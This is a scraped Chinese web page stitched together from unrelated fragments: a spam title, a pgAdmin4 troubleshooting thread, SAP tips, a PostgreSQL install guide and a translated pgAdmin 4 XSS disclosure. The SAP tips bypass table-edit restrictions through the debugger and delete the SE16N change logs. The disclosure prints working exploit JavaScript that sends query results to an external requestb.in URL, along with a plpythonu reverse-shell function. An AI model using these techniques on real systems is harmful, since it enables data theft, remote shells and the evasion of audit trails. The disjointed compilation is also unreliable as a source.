求速1到速8高清百度云资源

pgAdmin4 管理工具打开后,出现这样的情况怎么弄啊?
我打开pgadmin4出现这样的样子,上午还用的好好地,这是什么情况?
找到程序的安装位置,右键属性,然后解除锁定。。
--- 共有 3 条评论 ---
: 没有解决,不知道是什么原因,后来我用了pg3了
: 楼主,你的这个问题解决了吗?怎么解决的?今天遇到了同样的问题。安装完postgresql9.6.2后,打开pgAdmin和你一样的页面。
什么?哪里有锁定?
引用来自“羊驼君”的评论找到程序的安装位置,右键属性,然后解除锁定。。
你好,能详细说明下嘛,今天遇到了同样的问题。SAP直接改表方法
SE16N查看表,同时在命令栏中输入&sap_edit,系统提示修改状态激活,然后使用选择条件,选择数据,直接改表数据。
2.&第一步,进入SE16,输入需要修改的表的名字
第二步,在选择屏里输入点选择项来找数据,找你需要修改的那行
第三步,在表的内容输出的界面,在command
field里,就是用来输入tcode的那个地方,输入/H,回车,会看到下面有绿色提示,意思是debug
on第四步,找到需要修改的那一行,双击来显示,这个时候会进入代码,main
program是“LSETB”,source code of
是“LSETBF01”,在25行处,可以看到以下代码:&refresh
exclude_tab.if code =
&&……第五步,在这个if前加个断点,然后把code的值改成‘EDIT’,一定要按回车键,否则直接按F8后需要再次重复前面步骤
第六步,按F8运行,看到出来的结果是除了key
field,其他的字段都可以被修改了,修改后按保存按钮
中直接修改表、视图的Tcode有SE16N和SM30。
其中使用SE16N修改表需要先输入命令&SAP_EDIT,&回车左下角显示激活SAP编辑功能后,就可以对相应的表进行新增、删除、修改的操作。
有时输入&SAP_EDIT后还是不能激活,是因为另有地方限制,执行程序RKSE16N_EDIT,选中激活编辑功能后,问题得以解决。&另外,在EHP5版本中,激活编辑功能是不被允许的,不过程序中是通过一个判断语句来限制的,可以通过将相关的判断值判断前加断点,手工修改赋予值之后,问题也迎刃而解。&相关的判断语句可以通过查找关键字SE16N来寻找。
&在SAP中,如果使用SE16N直接修改表中的记录,特别是add-on表记录的修改,SAP会记录下来。记录的内容分别放在两个表中:SE16N_CD_DATA&SE16N_CD_KEY,其中Key是抬头信息,DATA是修改的内容。&如果使用SE16N对表做了修改,想查询修改记录,可以使用报表:RKSE16N_CD查看修改的历史。起初,这个报表只能查看,不能删除,不过到Ehp4版本的时候,删除功能也集成到这个报表中。如果不想使用这个报表,可以使用另外一个报表来进行删除:RKSE16N_CD_SHOW_DELETE&当然,这几个程序都是版本相关的,大家可以参考Notes:1275614,或者1263844。
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。参考原文链接:/sparkdev/p/5678874.html
安装前的检查
首先查看是否已经安装了旧版本:
dpkg -l |grep postgresql
如果已经安装了某个版本的postgresql,请先卸载。
安装postgresql
添加postgresql源:
sudo touch /etc/apt/sources.list.d/pgdb.list
sudo vim /etc/apt/sources.list.d/pgdb.list
把下面这行数据添加到pgdb.list文件中:
deb https://apt.postgresql.org/pub/repos/apt/ trusty-pgdg main
执行下面的命令添加postgresql安装包的秘钥:
sudo wget --quiet -O - https://postgresql.org/media/keys/ACCC4CF8.asc | sudo apt-key add -
接下来就可以安装了:
sudo apt-get update
sudo apt-get install postgresql-9.4
一切顺利的话就可以看下面的安装结果了:
OK,一共安装了五个组件。
创建数据库和角色
创建数据库和角色之前要启动postgresql服务:
$ service postgresql restart 重启$ service postgresql stop
停止$ service postgresql start 启动
接下来我们通过创建一个数据库和对应的角色来了解一下postgresql的基本用法。
先把用户切换到postgres(postgres是在安装postgresql的过程中创建的系统用户,这个用户的角色类似于sqlserver中的sa):
第一件事是使用\password命令,为postgres用户设置一个密码。
& &2. &\password postgres
sudo -i -u postgres
创建数据库 testdb:
createdb testdb
接下来创建角色 testuser,我们通过postgresql的客户端来实现:
在交互式命令中输入然后回车:
CREATE USER
// 这个命令创建的role默认具有登录权限
为 testuser 设置密码:
\password testuser
// 按照提示输入密码
把数据库 testdb 的所有者设置为 testuser:
ALTER DATABASE testdb OWNER TO
使用 \q 命令退出当前postgresql的登录,然后用下面的命令登录新建的数据库:
psql -d testdb -U testuser -h 127.0.0.1 -W
输入刚才为 testuser 设置的密码:
我们看到,当前的数据库已经是我们创建的 testdb 了。
安装pgAdmin3图形界面来管理Postgresql
1) 键入如下命令安装pgAdmin3
&sudo apt-get install pgadmin3
2) 键入如下命令运行pgAdmin3&
&若是安装失败请检查是否Ubuntu Soft的Source有问题,请将有问题的源勾选框改成不选中状态&
阅读(...) 评论()PostgreSQL管理工具pgAdmin 4中XSS漏洞的发现和利用
PostgreSQL管理工具pgAdmin 4中XSS的发现和利用。本文我将给大家讲述我是如何发现及利用pgAdmin4桌面客户端中的XSS漏洞。在看完本文之后,请尽快升级到1.4版本。
由于我一只手误触到新MacBookPro上那大得离谱的触摸板,pgAdmin 4页面不断放大缩小。这让我开始思索pgAdmin 4是否为Web应用。
如果这是一个Web应用(当时的我并没有那么肯定),我们是否可以尝试进行攻击呢?我第一件事做的就是进行简单的insert以及select操作。出乎预料的是,竟然能够完成操作!
这也意味着pgAdmin 4用户可以查看不可信数据(主要是来自Web应用的任意数据),也即存在注入攻击漏洞。接下来得找一个方法在获得的上下文中完成一些有趣的事情。我们必须要注意到2件事,一是环境对我们的限制,二是在正常环境下应用程序是如何执行各种操作的(即它是如何进行查询操作的)。
第一次失败:BeEF hook
我有尝试使用BeEF中强大的hook脚本(可戳《如何在BeEF中使用metloit颠覆你的》进行了解),但是它未能返回连接。我这个人很不耐烦,果断放弃了这个相对来说十分快速的方法,转而使用更简单可靠的(但是比较慢)的alert对该App进行黑盒测试。尽管我有其源代码,但我想真正理解代码执行时的环境约束。对环境观察了一段时间之后发现,如果可以找到任意一个全局变量或者属于窗口的对象,或许对于我们想像用户般执行操作会有帮助。然而一无所获,大约15分钟后我就放弃了。
构造一个查询语句
得知该应用程序可以进行查询操作,我仅仅只需要弄清楚它是如何实现的就可以了。我弹出window.location获取到监听服务的端口,之后使用tcpdump进行抓包。
将本机通信流量记录下之后我执行了如下查询:
tcpdump -vvnni lo0 -w pgadmin.pcap port 53108
这使得我获得由localhost:53108发起的各种各样的API调用。通过数据包抓取获得的细节这里就不在过多阐述。对于查询操作,我将其缩小为4个步骤来执行:
1.获取列表:/browser/database/nodes/1/1/
2.初始化查询工具:'/datagrid/initialize/query_tool/1/' + id (id来自步骤1)
3.构造查询语句:'/sqleditor/query_tool/start/' + gridTransId (id来自步骤2)
4.执行查询:'/sqleditor/poll/' + gridTransId (id来自步骤2)
第二次失败
我认为对本地服务执行CSRF攻击或许有的玩,但事实证明pgAdmin每次启动端口都会改变,此外还会请求一个token令牌进行设置,就目前来看我们没得玩啊。
以下为可用的exploit以及进行查询之后将结果发送到requestb.in的演示视频。https://youtu.be/3Dwpz5IYsCg
var query = 'select current_user, current_database()';
var exfil_url = 'http://requestb.in/1azh0xv1';
var exfil = function (data) {
&&& //alert('exfiltrating....');
&&& $.post(exfil_url, {data: JSON.stringify(data)}, function () {
// DB List
$.get('/browser/database/nodes/1/1/', function (response) {
&&& var d = JSON.stringify(response.data);
&&& var doStuff = function (arr) {
&&&&&&& if (arr.length == 0) {
&&&&&&&&&&& // all done
&&&&&&& var id = arr.shift()._
&&&&&&& // Query Tool Init
&&&&&&& $.post('/datagrid/initialize/query_tool/1/' + id, function (response) {
&&&&&&&&&&& var gridTransId = response.data.gridTransId;
&&&&&&&&&&& // Make Query
&&&&&&&&&&& $.ajax('/sqleditor/query_tool/start/' + gridTransId, {
&&&&&&&&&&&&&&& type: 'post',
&&&&&&&&&&&&&&& data: '&' + query + '&',
&&&&&&&&&&&&&&& dataType: 'json',
&&&&&&&&&&&&&&& contentType: 'application/json',
&&&&&&&&&&&&&&& success: function(response) {
&&&&&&&&&&&&&&&&&&& // Get Results
&&&&&&&&&&&&&&&&&&& setTimeout(function () {
&&&&&&&&&&&&&&&&&&&&&&& $.get('/sqleditor/poll/' + gridTransId, function (response) {
&&&&&&&&&&&&&&&&&&&&&&&&&&& exfil(response.data.result);
&&&&&&&&&&&&&&&&&&&&&&&&&&& return doStuff(arr);
&&&&&&&&&&&&&&&&&&&&&&& }).fail(function () {
&&&&&&&&&&&&&&&&&&&&&&&&&&& return doStuff(arr);
&&&&&&&&&&&&&&&&&&&&&&& })&&&&&&&
&&&&&&&&&&&&&&&&&&& }, 0);
&&&&&&&&&&&&&&& }
&&&&&&&&&&& }).fail(function () {
&&&&&&&&&&&&&&& return doStuff(arr);
&&&&&&&&&&& })
&&&&&&& }).fail(function () {
&&&&&&&&&&& return doStuff(arr);
&&&&&&& })
&&& doStuff(response.data);
做人如果没有梦想就跟咸鱼有什么分别!各位看客都看到这里了,我们就来搞搞RCE如何?如果连接到数据库的用户有些权限,执行以下3个请求将会帮助你获得一个非常不错的shell:
create language plpythonu
创建一个调用函数,你也可以将其放进上面的PoC中:
var query = 'CREATE OR REPLACE FUNCTION pwn() RETURNS text\\nLANGUAGE plpythonu\\nAS $$\\nimport socket,subprocess,os\\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\ns.connect((\\&127.0.0.1\\&,4445))\\nos.dup2(s.fileno(),0)\\nos.dup2(s.fileno(),1)\\nos.dup2(s.fileno(),2)\\na=subprocess.Popen([\\&/bin/sh\\&,\\&-i\\&])\\nreturn \\&\\&\\n$$;\\n';
select pwn()
03-16-2017 & 发现问题
03-17-2017 & 构造exploit
03-17-2017 & 向security@postgresql.org进行报告
03-20-2017 & Dave Page确认漏洞
03-31-2017 & 约一周后更新版本
04-10-2017 & 公布补丁

我要回帖

更多关于 速8代金券 的文章

 

随机推荐